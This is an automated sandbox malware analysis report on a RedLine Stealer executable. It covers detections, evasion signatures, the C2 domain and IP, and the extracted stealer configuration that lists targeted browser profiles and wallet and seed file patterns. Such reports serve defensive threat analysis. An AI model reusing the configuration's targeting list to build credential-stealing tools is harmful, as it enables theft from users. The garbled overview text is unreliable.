ID: 439033 Sample Name: z01OUde5Dj.exe Cookbook: default.jbs Time: 15:56:44 Date: 23/06/2021 Version: 32.0.0 Black Diamond Table of Contents

Table of Contents 2 Windows Analysis Report z01OUde5Dj.exe 4 Overview 4 General Information 4 Detection 4 Signatures 4 Classification 4 Process Tree 4 Malware Configuration 4 Threatname: RedLine 4 Yara Overview 5 Initial Sample 5 Memory Dumps 5 Unpacked PEs 6 Sigma Overview 6 Signature Overview 6 AV Detection: 6 Networking: 6 System Summary: 6 Data Obfuscation: 6 Malware Analysis System Evasion: 6 Anti Debugging: 6 Stealing of Sensitive Information: 7 Remote Access Functionality: 7 Mitre Att&ck Matrix 7 Behavior Graph 7 Screenshots 8 Thumbnails 8 Antivirus, Machine Learning and Genetic Malware Detection 9 Initial Sample 9 Dropped Files 9 Unpacked PE Files 9 Domains 9 URLs 9 Domains and IPs 11 Contacted Domains 11 Contacted URLs 11 URLs from Memory and Binaries 11 Contacted IPs 11 Public 11 General Information 11 Simulations 12 Behavior and APIs 12 Joe Sandbox View / Context 12 IPs 12 Domains 12 ASN 13 JA3 Fingerprints 13 Dropped Files 13 Created / dropped Files 13 Static File Info 13 General 13 File Icon 14 Static PE Info 14 General 14 Authenticode Signature 14 Entrypoint Preview 14 Data Directories 14 Sections 14 Resources 15 Imports 15 Version Infos 15 Possible Origin 15 Network Behavior 15 Network Port Distribution 15 TCP Packets 15 UDP Packets 15 DNS Queries 15 DNS Answers 15 HTTP Request Dependency Graph 16 HTTP Packets 16 Code Manipulations 18 Statistics 18 System Behavior 18 Copyright Joe Security LLC 2021 Page 2 of 19 Analysis Process: z01OUde5Dj.exe PID: 2792 Parent PID: 5644 18 General 18 File Activities 18 File Created 18 File Read 18 Registry Activities 18 Disassembly 18 Code Analysis 18

Copyright Joe Security LLC 2021 Page 3 of 19 Windows Analysis Report z01OUde5Dj.exe

Overview

General Information Detection Signatures Classification

Sample z01OUde5Dj.exe Name: AAnntttiiivviiirrruuss ddeettteecctttiiioonn fffoorrr UURRLL oorrr ddoomaaiiinn

Analysis ID: 439033 DADenettteievccirtttueesdd duuenntppeaacctcikokiiinn ggfo (((rcc hUhaaRnnLgg eoesrs dPPoEEm ssaeein… MD5: b66ba241fe7edb6… FDFooeuutenncddt e mda aulllwwnapararreec kccionongnff fii(iggcuuhrrraaantttiigiooenns PE se SHA1: Ransomware 99dccd2255ca91… Found malware configuration MFouuullltttniii dAA VmV SaSlcwcaaannrnene ecrrr o ddneeftittgeeucctrttiiaiootnino ffnfoorrr ddoomaa… Miner Spreading SHA256: e6313d65c6dfa85… Muullltttiii AAVV SSccaannnneerrr ddeettteecctttiiioonn fffoorrr sdsuoubmbma mmaallliiiccciiioouusss Muullltttiii AAVV SSccaannnneerrr ddeettteecctttiiioonn fffoorrr ssuubbm… malicious

Tags: exe RedLineStealer Evader Phishing sssuusssppiiiccciiioouusss YMYaaurrrlatai dAdeeVttte eScccttteaednd n RReeerd ddLLeiiintneeec StSiotttenea aflloleerrrr subm suspicious

cccllleeaann

Infos: clean ..Y.NNaEEraTT dsseootuuerrrcctee dcc ooRddeeed cLcooinnnettta aSiiinntses a mleeerttthhoodd … Most interesting Screenshot: Exploiter Banker F.FNooEuunTnd ds mouaarncnyey scstottrrridiinnegg scs o rrreneltllaattitenedsd mtttooe CCthrrryoypdptt t…

Spyware Trojan / Bot RedLine HFHoiiiddueenssd tt thmhrrreaeanadyd ss tfffrrrioonmgs d dreebblauutgeggdge etrrorss Crypt Adware

Score: 100 MHiaadccehhsiii nntheer LeLeaeadarsrrnn fiiirnnoggm dd edetetteebccutttiigioognne ffrfoosrrr ssaampp… Range: 0 - 100 PMPEEa c fffiihillleein cecoo Lnnetttaaiiirnnnssi n ssgee cdcttetiiiootennc wtwioiiitttnhh fssoppre esccaiiiamalll…p Whitelisted: false PPeEerrr fffoiolrerrm csso nDDtNaNiSnS s qq suueecrrritiieieossn tt towo didthoo mspaaeiiinncssia wwl … Confidence: 100% QPeuureefrorriiieremss s ss eDennNssSiiitttii ivvqeeu evviriidideeesoo t dode edvvoiiicmceea iiinnfffsoo rrwrm…

Quueerrryiye fsffiiirr rmsewwnasarirrteeiv ttetaa bvblillede e iiinonff fodorrermviaacttetiiioo inn f ((o(llliirikkm… Process Tree TQTrrruiiieessr y ttto of i rddmeetwtteeaccrttt e ss ataannbddlbebo oinxxefeossr m /// dadytyinonanam (liiickc… TTrrriiieess tttoo ddeettteeccttt ssaannddbbooxxeess a/a ndndyd n ooattthmheeicrrr…

System is w10x64 ATAVrVie ppsrr rotoocc edesessste sscttttrrr iiisnnaggnssd fffbooouuxnnedds (( (oaoffnfttteden no utuhsseeer… z01OUde5Dj.exe (PID: 2792 cmdline: 'C:\Users\user\Desktop\z01OUde5Dj.exe' MD5: B66BA241FE7EDB6C16DDD9341F1E84D4) AAnVnttt iiipvviriirroruucsse osorsrr Mstaraicnchhgiiisnn eefo LLueenaadrrr n(noiiinnftgge ndd eeutttseeecc… cleanup BABiininntaiavrrriyyr u ccsoo nontrtta aMiiinnassc aha i snsueus sLppeiiiccaiiioronuuisns g tttii imdeet esscttt…

CBChihneeaccrkyks sc ioiifff n ttththaeei n ccsuu rarrrrr eesnnuttts pprrirocoiccoeeussss t iiisms bebe esiiintn…

CCohonenttctaakiiinsn ssif cctahapepa acbbuiiilrlliirittteiiieensst ttptoor o ddceeetttesecsct tt i svv iiirbrrttteuuiaan…

Malware Configuration CCoonntttaaiiinnss llclooannpgga sbsllileleieteieppss t(((o>> ==d e 33t e mcitiin nv)))irtua

DCDeoettnteetcacttitenedsd plpooontttgee nnstttliieiaaelll pccrsrryy (pp>ttto=o f3ffuu nmnccitnttiiio)onn Threatname: RedLine EDEnenataebbcllleteessd dd peeobbtuueggn tppiarrriiliv vciiillrleeyggpeetoss function

EEnnttatrrryby l peposo iiindntett lblliiieuesgs oopuuritttvssiiilidedege e ssstttaannddaarrrdd sseecc…

FEFonouturnnyd dp aoa i hnhitiig glhihe nsn uuomutbbseeidrrr e oo fsff Wtaniiinndddaoorwdw s /// e UUcss…

HFHoTTuTTnPPd G aE EhTTig ohorr r n PPuOmSSbTTe r ww oiiittfth hWoouuinttt d aao uwuss e/e rrUr …s

IIHInnTttteeTrrrnPne eGttt PEPrTrroo voviiridd PeerOrr ssSeeTee nnw iiintnh cocouontn nane euccstttiieioornn …

MInataeyyr nssellleete ePppr o(((evevivdaaessriii vvsee ellloonoo pipnss )c)) otttoon nhheiiinncddtieoerrnr …

Moaonyni iittstoolerrrsse pcce e(rrertttavaaiiinns irrrveeegg iilisosttotrrrypy s kk)ee tyyoss h /// i nvvadalelluur…

PMPEEo n /// i OtoLrLsEE c fffeiiillleret a hhianas sr eaagnni s iiintnrvvyaa kllliiieddy ccsee /rrr ttvtiiiffafiiiccluaatttee

PPEE ff/fii illOlee L ccEoon nftittlaaeiii nnhssa sse eaccnttti iioionnnvssa wlwidiiitt thch e nnrotoinfni-c--ssa…te

PPEE fffiiilllee ccoonntttaaiiinnss ssttetrrracatnnioggnees rr rewessitoohuu nrrrccoeenss-s

QPEuue efrirrliiiee ssc ottthhneeta vvinoosllluu smtreea niiinngfffoeor rrrmeasaotttiiiouonrnc (e((nnsaam…

SQSaaumerppielllees ffftiiihllleee i iisvs o ddliuiifffffmfeerreree nintttf ottthhramanna otoiorrriiingg iiin(nnaaalll m …

USUsasemessp 3l3e22 bfbiiliitett P PisEE d fffiiiflllefeessrent than original

UUsseess c3co2odbdeiet oPobbEfffu ufsisleccasatttiiioonn ttteecchhnniiiqquueess (((…

YUYasarreraas ddceeotttdeeecc tttoeebddf uCCsrrrceeaddteeionnntttii iaatelll cSShttteneaiaqllleuerrer s (

Yara detected Credential Stealer

Copyright Joe Security LLC 2021 Page 4 of 19 { "BlockedCountry": [], "BlockedIP": [], "ScanBrowsers": "true", "ScanChromeBrowsersPaths": [ "%USERPROFILE%\\AppData\\Local\\Chromium\\User Data", "%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data", "%USERPROFILE%\\AppData\\Local\\Google(x86)\\Chrome\\User Data", "%USERPROFILE%\\AppData\\Roaming\\Opera Software\\", "%USERPROFILE%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", "%USERPROFILE%\\AppData\\Local\\Iridium\\User Data", "%USERPROFILE%\\AppData\\Local\\7Star\\7Star\\User Data", "%USERPROFILE%\\AppData\\Local\\CentBrowser\\User Data", "%USERPROFILE%\\AppData\\Local\\Chedot\\User Data", "%USERPROFILE%\\AppData\\Local\\Vivaldi\\User Data", "%USERPROFILE%\\AppData\\Local\\Kometa\\User Data", "%USERPROFILE%\\AppData\\Local\\Elements Browser\\User Data", "%USERPROFILE%\\AppData\\Local\\Epic Privacy Browser\\User Data", "%USERPROFILE%\\AppData\\Local\\uCozMedia\\Uran\\User Data", "%USERPROFILE%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", "%USERPROFILE%\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", "%USERPROFILE%\\AppData\\Local\\Coowon\\Coowon\\User Data", "%USERPROFILE%\\AppData\\Local\\liebao\\User Data", "%USERPROFILE%\\AppData\\Local\\QIP Surf\\User Data", "%USERPROFILE%\\AppData\\Local\\Orbitum\\User Data", "%USERPROFILE%\\AppData\\Local\\Comodo\\Dragon\\User Data", "%USERPROFILE%\\AppData\\Local\\Amigo\\User\\User Data", "%USERPROFILE%\\AppData\\Local\\Torch\\User Data", "%USERPROFILE%\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", "%USERPROFILE%\\AppData\\Local\\Comodo\\User Data", "%USERPROFILE%\\AppData\\Local\\360Browser\\Browser\\User Data", "%USERPROFILE%\\AppData\\Local\\Maxthon3\\User Data", "%USERPROFILE%\\AppData\\Local\\K-Melon\\User Data", "%USERPROFILE%\\AppData\\Local\\Sputnik\\Sputnik\\User Data", "%USERPROFILE%\\AppData\\Local\\Nichrome\\User Data", "%USERPROFILE%\\AppData\\Local\\CocCoc\\Browser\\User Data", "%USERPROFILE%\\AppData\\Local\\Uran\\User Data", "%USERPROFILE%\\AppData\\Local\\Chromodo\\User Data", "%USERPROFILE%\\AppData\\Local\\Mail.Ru\\Atom\\User Data", "%USERPROFILE%\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", "%USERPROFILE%\\AppData\\Local\\Microsoft\\Edge\\User Data", "%USERPROFILE%\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", "%USERPROFILE%\\AppData\\Local\\Steam", "%USERPROFILE%\\AppData\\Local\\CryptoTab Browser\\User Data" ], "ScanDiscord": "true", "ScanFTP": "false", "ScanFiles": "false", "ScanFilesPaths": [ "%userprofile%\\Desktop|*.txt,*.doc*,*key*,*wallet*,*seed*|0", "%userprofile%\\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*|0" ], "ScanGeckoBrowsersPaths": [ "%USERPROFILE%\\AppData\\Roaming\\Mozilla\\Firefox", "%USERPROFILE%\\AppData\\Roaming\\Waterfox", "%USERPROFILE%\\AppData\\Roaming\\K-Meleon", "%USERPROFILE%\\AppData\\Roaming\\Thunderbird", "%USERPROFILE%\\AppData\\Roaming\\Comodo\\IceDragon", "%USERPROFILE%\\AppData\\Roaming\\8pecxstudios\\Cyberfox", "%USERPROFILE%\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", "%USERPROFILE%\\AppData\\Roaming\\Moonchild Productions\\Pale Moon" ], "ScanScreen": "false", "ScanSteam": "false", "ScanTelegram": "false", "ScanVPN": "false", "ScanWallets": "true" }

Yara Overview

Initial Sample

Source Rule Description Author Strings z01OUde5Dj.exe JoeSecurity_RedLine Yara detected Joe Security RedLine Stealer

Memory Dumps

Source Rule Description Author Strings Process Memory Space: z01OUde5Dj.exe PID: 2792 JoeSecurity_RedLine Yara detected Joe Security RedLine Stealer Copyright Joe Security LLC 2021 Page 5 of 19 Source Rule Description Author Strings

Process Memory Space: z01OUde5Dj.exe PID: 2792 JoeSecurity_CredentialSte Yara detected Joe Security aler Credential Stealer

Unpacked PEs

Source Rule Description Author Strings 1.2.z01OUde5Dj.exe.2b0000.0.unpack JoeSecurity_RedLine Yara detected Joe Security RedLine Stealer 1.0.z01OUde5Dj.exe.2b0000.0.unpack JoeSecurity_RedLine Yara detected Joe Security RedLine Stealer

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Networking:

Performs DNS queries to domains with low reputation

System Summary:

PE file contains section with special chars

Data Obfuscation:

Detected unpacking (changes PE section rights)

.NET source code contains method to dynamically call methods (often used by packers)

Malware Analysis System Evasion:

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Anti Debugging:

Hides threads from debuggers

Copyright Joe Security LLC 2021 Page 6 of 19 Tries to detect sandboxes and other dynamic analysis tools (window names)

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Found many strings related to Crypto-Wallets (likely being stolen)

Remote Access Functionality:

Yara detected RedLine Stealer

Mitre Att&ck Matrix

Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Windows Path Process Disable or Modify OS Query Registry 1 Remote Archive Exfiltration Encrypted Eavesdrop on Accounts Management Interception Injection 1 Tools 1 Credential Services Collected Over Other Channel 1 Insecure Instrumentation 1 Dumping Data 1 1 Network Network Medium Communication Default Command and Boot or Boot or Virtualization/Sandbox LSASS Security Software Remote Data from Exfiltration Non- Exploit SS7 to Accounts Scripting Logon Logon Evasion 4 4 1 Memory Discovery 5 3 Desktop Local Over Application Redirect Phone Interpreter 2 Initialization Initialization Protocol System 1 Bluetooth Layer Calls/SMS Scripts Scripts Protocol 2 Domain At (Linux) Logon Script Logon Process Injection 1 Security Process Discovery 1 SMB/Windows Data from Automated Application Exploit SS7 to Accounts (Windows) Script Account Admin Shares Network Exfiltration Layer Track Device (Windows) Manager Shared Protocol 2 Location Drive Local At (Windows) Logon Script Logon Deobfuscate/Decode NTDS Virtualization/Sandbox Distributed Input Scheduled Protocol SIM Card Accounts (Mac) Script Files or Information 1 Evasion 4 4 1 Component Capture Transfer Impersonation Swap (Mac) Object Model Cloud Cron Network Network Obfuscated Files or LSA Application Window SSH Keylogging Data Fallback Manipulate Accounts Logon Script Logon Information 2 Secrets Discovery 1 Transfer Channels Device Script Size Limits Communication

Replication Launchd Rc.common Rc.common Software Cached Remote System VNC GUI Input Exfiltration Multiband Jamming or Through Packing 2 3 Domain Discovery 1 Capture Over C2 Communication Denial of Removable Credentials Channel Service Media External Scheduled Task Startup Startup Timestomp 1 DCSync System Information Windows Web Exfiltration Commonly Rogue Wi-Fi Remote Items Items Discovery 1 3 Remote Portal Over Used Port Access Points Services Management Capture Alternative Protocol

Behavior Graph

Copyright Joe Security LLC 2021 Page 7 of 19 Hide Legend Legend: Process Signature Behavior Graph Created File ID: 439033 DNS/IP Info Sample: z01OUde5Dj.exe Startdate: 23/06/2021 Is Dropped Architecture: WINDOWS Score: 100 Is Windows Process

Number of created Registry Values

Number of created Files zedaumalev.xyz prda.aadg.msidentity.com Visual Basic started Delphi

Multi AV Scanner detection Antivirus detection Found malware configuration 7 other signatures for domain / URL for URL or domain Java .Net C# or VB.NET

C, C++ or other language z01OUde5Dj.exe Is malicious

15 2 Internet

zedaumalev.xyz

77.246.145.4, 49726, 49733, 80 api.ip.sb THEFIRST-ASRU Russian Federation

Queries sensitive video device information (via Query firmware table Detected unpacking (changes WMI, Win32_VideoController, information (likely 4 other signatures PE section rights) often done to detect to detect VMs) virtual machines)

Screenshots

Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Copyright Joe Security LLC 2021 Page 8 of 19 Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source Detection Scanner Label Link z01OUde5Dj.exe 43% Virustotal Browse z01OUde5Dj.exe 39% ReversingLabs Win32.Trojan.Generic z01OUde5Dj.exe 100% Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source Detection Scanner Label Link Download 1.0.z01OUde5Dj.exe.2b0000.0.unpack 100% Avira TR/Crypt.ZPACK.Gen Download File

Domains

Source Detection Scanner Label Link zedaumalev.xyz 8% Virustotal Browse

URLs

Copyright Joe Security LLC 2021 Page 9 of 19 Source Detection Scanner Label Link service.r 0% URL Reputation safe service.r 0% URL Reputation safe service.r 0% URL Reputation safe schemas.m 0% URL Reputation safe schemas.m 0% URL Reputation safe schemas.m 0% URL Reputation safe ocsp.sectigo.com0 0% URL Reputation safe ocsp.sectigo.com0 0% URL Reputation safe ocsp.sectigo.com0 0% URL Reputation safe tempuri.org/Endpoint/GetArguments 0% Avira URL Cloud safe https://api.ip.sb/geoip 0% URL Reputation safe https://api.ip.sb/geoip 0% URL Reputation safe https://api.ip.sb/geoip 0% URL Reputation safe https://d41.co 0% Avira URL Cloud safe https://postlnk.com/afu.php? 0% Avira URL Cloud safe zoneid=2579647&var=2579647&rid=wfxzsvAkbQDjdtH2xjZy_Q%3D%3D tempuri.org/ 0% Avira URL Cloud safe https://googleads.g.doub 0% Avira URL Cloud safe tempuri.org/L 0% Avira URL Cloud safe tempuri.org/Endpoint/VerifyUpdateResponse 0% Avira URL Cloud safe www.remote88.com:808/feii/ 0% Avira URL Cloud safe go.micros 0% URL Reputation safe go.micros 0% URL Reputation safe go.micros 0% URL Reputation safe tempuri.org/Endpoint/GetUpdates 0% Avira URL Cloud safe tempuri.org/Endpoint/VerifyScanRequest 0% Avira URL Cloud safe www.interoperabilitybridges.com/wmp-extension-for-chrome 0% URL Reputation safe www.interoperabilitybridges.com/wmp-extension-for-chrome 0% URL Reputation safe www.interoperabilitybridges.com/wmp-extension-for-chrome 0% URL Reputation safe https://sectigo.com/CPS0D 0% URL Reputation safe https://sectigo.com/CPS0D 0% URL Reputation safe https://sectigo.com/CPS0D 0% URL Reputation safe tempuri.org/Endpoint/VerifyUpdate 0% Avira URL Cloud safe zedaumalev.xyz/ 100% Avira URL Cloud malware support.a 0% URL Reputation safe support.a 0% URL Reputation safe support.a 0% URL Reputation safe zedaumalev.xyz4 0% Avira URL Cloud safe https://bludwan.com/afu.php? 0% Avira URL Cloud safe zoneid=2974233&var=2974233&rid=wfxzsvAkbQDjdtH2xjZy_Q%253D%253D https://watchseriesmovie.online/movie/570670/the-invisible-man%22 0% Avira URL Cloud safe schemas.datacontract.org/2004/07/ 0% URL Reputation safe schemas.datacontract.org/2004/07/ 0% URL Reputation safe schemas.datacontract.org/2004/07/ 0% URL Reputation safe zedaumalev.xyz 100% Avira URL Cloud malware https://api.ip.sb4 0% URL Reputation safe https://api.ip.sb4 0% URL Reputation safe https://api.ip.sb4 0% URL Reputation safe https://api.ip.sb/geoip%USERPEnvironmentROFILE% 0% URL Reputation safe https://api.ip.sb/geoip%USERPEnvironmentROFILE% 0% URL Reputation safe https://api.ip.sb/geoip%USERPEnvironmentROFILE% 0% URL Reputation safe https://helpx.ad 0% URL Reputation safe https://helpx.ad 0% URL Reputation safe https://helpx.ad 0% URL Reputation safe https://dmz01.app.clic 0% Avira URL Cloud safe tempuri.org/0D 0% Avira URL Cloud safe zedaumalev.xyz:80/ 100% Avira URL Cloud malware https://get.adob 0% URL Reputation safe https://get.adob 0% URL Reputation safe https://get.adob 0% URL Reputation safe tempuri.org/Endpoint/GetArgumentsResponse 0% Avira URL Cloud safe crl.sectigo.com/SectigoRSATimeStampingCA.crl0t 0% URL Reputation safe crl.sectigo.com/SectigoRSATimeStampingCA.crl0t 0% URL Reputation safe crl.sectigo.com/SectigoRSATimeStampingCA.crl0t 0% URL Reputation safe

Copyright Joe Security LLC 2021 Page 10 of 19 Source Detection Scanner Label Link 10.223.5.145:8080 0% Avira URL Cloud safe crt.sectigo.com/SectigoRSATimeStampingCA.crt0# 0% URL Reputation safe crt.sectigo.com/SectigoRSATimeStampingCA.crt0# 0% URL Reputation safe crt.sectigo.com/SectigoRSATimeStampingCA.crt0# 0% URL Reputation safe https://icanhazip.com4https://wtfismyip.com/textBbot.whatismyipaddress.com/2http://checkip.dy 0% Avira URL Cloud safe forms.rea 0% URL Reputation safe forms.rea 0% URL Reputation safe forms.rea 0% URL Reputation safe tempuri.org/Endpoint/GetUpdatesResponse 0% Avira URL Cloud safe https://thebestvpndeals.com/best-vpn/ 0% Avira URL Cloud safe tempuri.org/Endpoint/VerifyScanRequestResponse 0% Avira URL Cloud safe

Domains and IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection Reputation zedaumalev.xyz 77.246.145.4 true true 8%, Virustotal, Browse unknown api.globalsign.cloud 104.18.24.243 true false unknown api.ip.sb unknown unknown false unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation zedaumalev.xyz/ true Avira URL Cloud: malware unknown

URLs from Memory and Binaries

Contacted IPs

Public

IP Domain Country Flag ASN ASN Name Malicious 77.246.145.4 zedaumalev.xyz Russian Federation 29182 THEFIRST-ASRU true

General Information

Joe Sandbox Version: 32.0.0 Black Diamond Analysis ID: 439033 Start date: 23.06.2021 Start time: 15:56:44 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 6m 38s Hypervisor based Inspection enabled: false Report type: light Sample file name: z01OUde5Dj.exe Cookbook file name: default.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes 14 analysed: Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0

Copyright Joe Security LLC 2021 Page 11 of 19 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL Classification: mal100.troj.spyw.evad.winEXE@1/0@4/1 EGA Information: Failed HDC Information: Failed HCA Information: Failed Cookbook Comments: Adjust boot time Enable AMSI Found application associated with file extension: .exe Warnings: Show All

Simulations

Behavior and APIs

Time Type Description 15:58:04 API Interceptor 21x Sleep call for process: z01OUde5Dj.exe modified

Joe Sandbox View / Context

IPs

Match Associated Sample Name / URL SHA 256 Detection Link Context 77.246.145.4 file5.exe Get hash malicious Browse zedaumale v.xyz/ mABjln5TWY.exe Get hash malicious Browse xiplisineld.xyz/ DjILCIP9hY.exe Get hash malicious Browse xiplisineld.xyz/

Domains

Match Associated Sample Name / URL SHA 256 Detection Link Context zedaumalev.xyz file5.exe Get hash malicious Browse 77.246.145.4 api.globalsign.cloud Wire Info.docx Get hash malicious Browse 104.18.25.243 UtCpzrmwGu.exe Get hash malicious Browse 104.18.24.243 RvWeTt8ldZ.exe Get hash malicious Browse 104.18.24.243 certificate-06.21.2021.doc Get hash malicious Browse 104.18.25.243 2cAwMgDOoJ.dll Get hash malicious Browse 104.18.25.243 tVbylB68KX.exe Get hash malicious Browse 104.18.25.243 2niwu9RX7S.exe Get hash malicious Browse 104.18.24.243 W1LADtfe9W.exe Get hash malicious Browse 104.18.25.243 A393FB9AD8A42849AAD09CBB83C6D4E9B32A4062 Get hash malicious Browse 104.18.24.243 76B8F.exe B9BD8B8A68C178B40CBE38AF42B5023B0BA6B72B Get hash malicious Browse 104.18.25.243 BDADF.exe Z5ZqTSn7Ug.exe Get hash malicious Browse 104.18.25.243 bRvjhaDw5v.exe Get hash malicious Browse 104.18.25.243 1lJOC0jbic.exe Get hash malicious Browse 104.18.24.243

Death_In_Vegas_-_Dead_Elvis_814616-1.exe Get hash malicious Browse 104.18.24.243 taQ3CBmblo.exe Get hash malicious Browse 104.18.24.243 7100173026-ORG.doc Get hash malicious Browse 104.18.24.243 contract_proforma_invoice.exe Get hash malicious Browse 104.18.24.243 app.dll Get hash malicious Browse 104.18.24.243 Yeni sipari_ WJO-001, pdf.exe Get hash malicious Browse 104.18.24.243 FBt9o6x4r5.exe Get hash malicious Browse 104.18.25.243

Copyright Joe Security LLC 2021 Page 12 of 19 ASN

Match Associated Sample Name / URL SHA 256 Detection Link Context THEFIRST-ASRU ebsL2ZF4ww.exe Get hash malicious Browse 62.109.8.10 CPPDolphinInfected.exe Get hash malicious Browse 82.146.44.166 PDHIfAIr0l.exe Get hash malicious Browse 82.146.63.219 dhz7CHgHBx.exe Get hash malicious Browse 185.43.4.137 JB3aOL8aju.exe Get hash malicious Browse 212.109.19 6.168 boI88C399w.exe Get hash malicious Browse 78.24.219.147 boI88C399w.exe Get hash malicious Browse 78.24.219.147 H52KKfQd1I.exe Get hash malicious Browse 82.146.57.148 Bx3NdrImpt.exe Get hash malicious Browse 212.109.19 9.108 dn5EcG4gHy.exe Get hash malicious Browse 185.43.6.178 patcher.exe Get hash malicious Browse 188.120.236.34 sE3PiwL1fx.exe Get hash malicious Browse 188.120.236.34 A393FB9AD8A42849AAD09CBB83C6D4E9B32A4062 Get hash malicious Browse 82.146.61.137 76B8F.exe 5sF4QVZ67t.exe Get hash malicious Browse 62.109.24.104 B9BD8B8A68C178B40CBE38AF42B5023B0BA6B72B Get hash malicious Browse 79.174.13.146 BDADF.exe 5AD94A2FFA3E6B23061E726CE0C09648811C4294 Get hash malicious Browse 92.63.99.159 F048D.exe 9eex2KNXBT.exe Get hash malicious Browse 149.154.71.163 w8S6R0Jtjj.exe Get hash malicious Browse 62.109.24.104 dqVPlpmWYt.exe Get hash malicious Browse 37.230.116.121 P4SRvI1baM.exe Get hash malicious Browse 82.202.161.188

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General File type: PE32 executable (GUI) Intel 80386, for MS Windows Entropy (8bit): 7.863618874642304 TrID: Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00% File name: z01OUde5Dj.exe File size: 2958360 MD5: b66ba241fe7edb6c16ddd9341f1e84d4 SHA1: 99dccd2255ca919d8042e8d33d03d70b02dec67d SHA256: e6313d65c6dfa85c2aa1f5cfefc0b71ec47d6b9f6f4ef5351 fd86b9f6fbbd935 SHA512: 3ab3c6acfb1a2b793ff99fbe5a53f904e65f97837af8950de 884251a2df34151ba836e9346db6202b2e936c2e306317 6dfc3b7b1eadfeb1fde33a75a5772db4f

Copyright Joe Security LLC 2021 Page 13 of 19 General SSDEEP: 49152:2oyvuUr24Qavxv5xOpDYFtBq0z0sRAHjZZJscV K8Fzc/yfyjS:2VvDJqhDsuHjZTscVK8FyS File Content Preview: MZ...... @...... !..L.!Th is program cannot be run in DOS mode....$...... PE..L...... x...... X...... @...... q...... @......

File Icon

Icon Hash: 235dd4d4d4d469ab

Static PE Info

General Entrypoint: 0x988680 Entrypoint Section: .boot Digitally signed: true Imagebase: 0x400000 Subsystem: windows gui Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE Time Stamp: 0xC4BF1DD9 [Tue Aug 7 09:22:33 2074 UTC] TLS Callbacks: CLR (.Net) Version: OS Version Major: 4 OS Version Minor: 0 File Version Major: 4 File Version Minor: 0 Subsystem Version Major: 4 Subsystem Version Minor: 0 Import Hash: 4328f7206db519cd4e82283211d98e83

Authenticode Signature

Signature Valid: false Signature Issuer: CN=Xiaomi Haylou GT1 XR Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider Error Number: -2146762487 Not Before, Not After 6/21/2021 5:20:22 AM 6/22/2031 5:20:22 AM Subject Chain CN=Xiaomi Haylou GT1 XR Version: 3 Thumbprint MD5: 61C379BD64BB0C74B4C2976C1E9EF931 Thumbprint SHA-1: AC3E67FC17E674883A4D450FA93FFB4EEED173F4 Thumbprint SHA-256: 8DEFADAEEDD094CD43596A0C67827874ACB416A73C48920328DBFE52E968DF15 Serial: 193A579190FBB3BF4A1ACEB10B1FF102

Entrypoint Preview

Data Directories

Sections

Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics .text 0x2000 0x2e000 0x2da00 False 0.502745077055 data 6.23484848007 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ .sdata 0x30000 0xeba 0x1000 False 0.4453125 data 4.15274478588 IMAGE_SCN_CNT_INITIALIZED_D ATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ 0x32000 0x196550 0xd9000 False 0.9999437464 data 7.99979318933 IMAGE_SCN_CNT_INITIALIZED_D ATA, IMAGE_SCN_MEM_READ .reloc 0x1ca000 0xc 0x200 False 0.044921875 data 0.101910425663 IMAGE_SCN_CNT_INITIALIZED_D ATA, IMAGE_SCN_MEM_READ

